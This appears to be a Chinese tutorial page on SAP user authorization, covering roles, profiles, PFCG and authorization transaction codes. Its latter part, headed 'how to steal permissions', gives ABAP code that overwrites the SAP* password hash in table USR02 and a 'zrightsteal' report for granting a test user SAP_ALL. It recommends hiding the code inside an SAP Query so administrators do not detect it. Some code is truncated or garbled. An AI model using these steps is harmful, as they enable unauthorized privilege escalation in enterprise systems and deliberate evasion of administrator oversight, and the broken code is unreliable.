最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
SAP 用户权限解剖详解
时间:2022-06-28 17:48:44 编辑:袖梨 来源:一聚教程网
【IT168 信息化】
通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name,
记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?
首先明白几个概念.
1.activity
这样说吧,我们从activity谈起,activity是什么意思这个你查下
字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两,
不对,这是我老婆讲的,SAP不是这样子的,是只能insert, update,display什么的.
这些东西当年德国佬是写在tobj表中的.
activity 也是可分activity group的.
2.activity category &Authorization group
Role Vs Profile
你看看表T020就知道了,就是什么K,D, A, M什么的.
profile是什么呢?实际上可以理解为所有的authorization data(有很多authorization group--{你可使用OBA7填写,
权限太细也不是好事^_^}和activity组成)的一个集合的名字,通常一个自定义的role产
生一个profile,SAP权限控制是根据profile里的authorization data(objects)来控制的.
role又是什么呢?role只是一个名字而已,然后将profile赋予给它, 比如你SU01建立一个
用户,我没有任何role,但是加如SAP_All profile
也是可做任何事情.
SAP本身有很多default role & profile.
3.最常用的PFCG
->authorizations->change authorization data->
进入后选取selection criteria 可看到所有的authorization object
manually可手工加authorization object,比如你使用某个t-code权限出错误,abap使用SU53检查就
知道缺少哪个authorization objec,然后手工加入就可以.
你选去authorization levels就可by account type再细分权限.
有些甚至直接到表字段.而且你甚至可?一个object分配缓存buffer.
那么SAP是如何做到权限控制的呢,屠夫就用刀小宰一下.
4.关于权限方面的几个t-code.
(一)Role(角色)相关T-code:
PFAC 标准
PFAC_CHG 改变
PFAC_DEL 删除
PFAC_DIS 显示
PFAC_INS 新建
PFAC_STR
PFCG 创建
ROLE_CMP 比较
SUPC 批量建立角色profile
SWUJ 测试
SU03 检测authorzation data
SU25, SU26 检查updated profile
(二)建立用户相关T-code:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, Su51, SU52
SU1
SU10 批量
SU12 批量
SUCOMP:维护用户公司地址
SU2 change用户参数
SUIM 用户信息系统
用户组
SUGR:维护
SUGRD:显示
SUGRD_NAV:还是维护
SUGR_NAV:还是显示
(三)关于profile&Authoraztion Data
| 代码如下 | 复制代码 |
|
SU02:直接创建profile不用role SU21(SU03):****维护Authorization Objects(TOBJ,USR12). 对具体transaction code细分: DB和logical层: |
|
..............................
如何窃取权限
..............................
用户:
| 代码如下 | 复制代码 |
| User type用户类型: 通常的用户类型有 a.dialog (就是normal user) b.communication c.system d.service e.reference. |
|
通常你在使用任何T-code前一定会有权限检测的.
AUTHORITY_CHECK:这个函数只是小检查一下你的user有没有,什么时候过期.
**如果coding只要使用此函数就够了.
AUTHORITY_CHECK_TCODE:检查T-code
这?z函数是真正检查autorization objects的.
| 代码如下 | 复制代码 |
| SUSR_USER_AUTH_FOR_OBJ_GET: A UTHORIZATION_DATA_READ_SELOBJ: |
|
------------------------------------------
将SAP*的密码改成123的程序,很简单.
我们找到那个user logon表USR02.
| 代码如下 | 复制代码 |
| (DF52478E6FF90EEB是经过SAP加密保存在DB的,SAP的密码加密?) report zmodSAP*. data zUSR02 like USR02 . select single * into zUSR02 from USR02 where BNAME = 'SAP*'. zUSR02-Bcode = 'DF52478E6FF90EEB' . Update USR02 from zUSR02 . |
|
现在的问题是如何让你那basis不发现,很简单,将code隐藏在Query里面,就是说你做一个
query,query是会产生code的,然后你加入此代码,谁能想到???然后你就等你的basis去哭...
这样做太狠毒了.还是自己偷偷搞自己的用户吧.
在此你必须对权限结构非常清晰.
权限和三个表有关系.
| 代码如下 | 复制代码 |
|
a.USR04 report zrightsteal. **Update User authorization masters table UST04 . *?????insert select * from USRBF2 into table ZUSRBF2 |
|
自己建立一个ztest用户不给它任何权限然后在test machine上run 报表zrightsteal.
然后ztest就是SAP_ALL了, 然后你将code hide在SQP query的code中.ABAPcode太容易被人发现
相关文章
- 明日方舟BB-EX-6突袭攻略 明日方舟BB-EX-6突袭怎么打 04-20
- 金铲铲之战S11青花瓷拉克丝阵容怎么搭配 金铲铲之战S11青花瓷拉克丝阵容选择推荐 04-20
- 欢乐钓鱼大师刀疤鱼怎么钓 04-20
- 塞尔达传说王国之泪石头人心脏作用是什么 04-20
- 哈迪斯2修改器在哪下载 04-20
- 恶意不息修改器在哪下载 04-20